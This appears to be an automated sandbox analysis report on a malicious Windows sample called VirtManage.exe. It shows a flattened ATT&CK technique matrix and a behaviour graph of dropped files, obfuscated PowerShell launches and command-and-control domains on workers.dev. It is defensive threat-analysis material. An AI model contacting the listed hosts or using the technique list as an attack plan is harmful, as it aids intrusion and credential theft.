Email AddressesDNS ServerDomain Accounts1
Service Execution		1
Windows Service		1
Access Token Manipulation		3
Obfuscated Files or Information		Security Account Manager125
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		1
Office Application Startup		1
Windows Service		1
DLL Side-Loading		NTDS211
Security Software Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		11
Process Injection		1
DLL Search Order Hijacking		LSA Secrets1
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Registry Run Keys / Startup Folder		11
Masquerading		Cached Domain Credentials131
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632485 Sample: VirtManage.exe Startdate: 08/03/2025 Architecture: WINDOWS Score: 46 96 nginx-server.paxivo2460.workers.dev 2->96 98 ec2-server.bayaj19162.workers.dev 2->98 106 Antivirus detection for dropped file 2->106 108 Multi AV Scanner detection for dropped file 2->108 110 Multi AV Scanner detection for submitted file 2->110 112 3 other signatures 2->112 10 VirtManage.exe 2 36 2->10         started        13 winapi.exe 2->13         started        16 msiexec.exe 2->16         started        18 svchost.exe 2->18         started        signatures3 process4 dnsIp5 88 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 10->88 dropped 90 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 10->90 dropped 92 C:\ProgramData\Microsoft\...\winapi.exe, PE32+ 10->92 dropped 94 9 other malicious files 10->94 dropped 21 winapi.exe 10->21         started        24 msiexec.exe 11 10->24         started        27 gpg.exe 4 10->27         started        34 7 other processes 10->34 124 Suspicious powershell command line found 13->124 126 Obfuscated command line found 13->126 29 powershell.exe 13->29         started        32 msiexec.exe 1 1 16->32         started        100 127.0.0.1 unknown unknown 18->100 file6 signatures7 process8 dnsIp9 114 Suspicious powershell command line found 21->114 116 Obfuscated command line found 21->116 36 powershell.exe 21->36         started        78 C:\Users\user\AppData\Local\...\MSI2CE4.tmp, PE32 24->78 dropped 80 C:\Users\user\AppData\Local\...\MSI2C66.tmp, PE32 24->80 dropped 82 C:\ProgramData\Microsoft\...\7za.dll, PE32+ 27->82 dropped 41 conhost.exe 27->41         started        104 ec2-server.bayaj19162.workers.dev 172.67.153.11, 443, 49713, 49715 CLOUDFLARENETUS United States 29->104 118 Uses whoami command line tool to query computer and username 29->118 43 csc.exe 29->43         started        51 2 other processes 29->51 45 7za.exe 6 32->45         started        53 2 other processes 32->53 84 C:\ProgramData\Microsoft\...\7za.exe, PE32+ 34->84 dropped 47 conhost.exe 34->47         started        49 conhost.exe 34->49         started        55 5 other processes 34->55 file10 signatures11 process12 dnsIp13 102 nginx-server.paxivo2460.workers.dev 188.114.96.3, 443, 49692, 49693 CLOUDFLARENETUS European Union 36->102 68 C:\Users\user\AppData\...\2s4bn4bw.cmdline, Unicode 36->68 dropped 120 Uses whoami command line tool to query computer and username 36->120 122 Loading BitLocker PowerShell Module 36->122 57 csc.exe 36->57         started        60 conhost.exe 36->60         started        62 whoami.exe 36->62         started        70 C:\Users\user\AppData\Local\...\e3jseyke.dll, PE32 43->70 dropped 64 cvtres.exe 43->64         started        72 C:\ProgramData\Microsoft\...\winapi.exe, PE32+ 45->72 dropped 74 C:\ProgramData\Microsoft\...\aclui.dll, PE32+ 45->74 dropped 76 C:\ProgramData\Microsoft\...\aclui-2.dll, PE32+ 45->76 dropped file14 signatures15 process16 file17 86 C:\Users\user\AppData\Local\...\2s4bn4bw.dll, PE32 57->86 dropped 66 cvtres.exe 57->66         started        process18

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.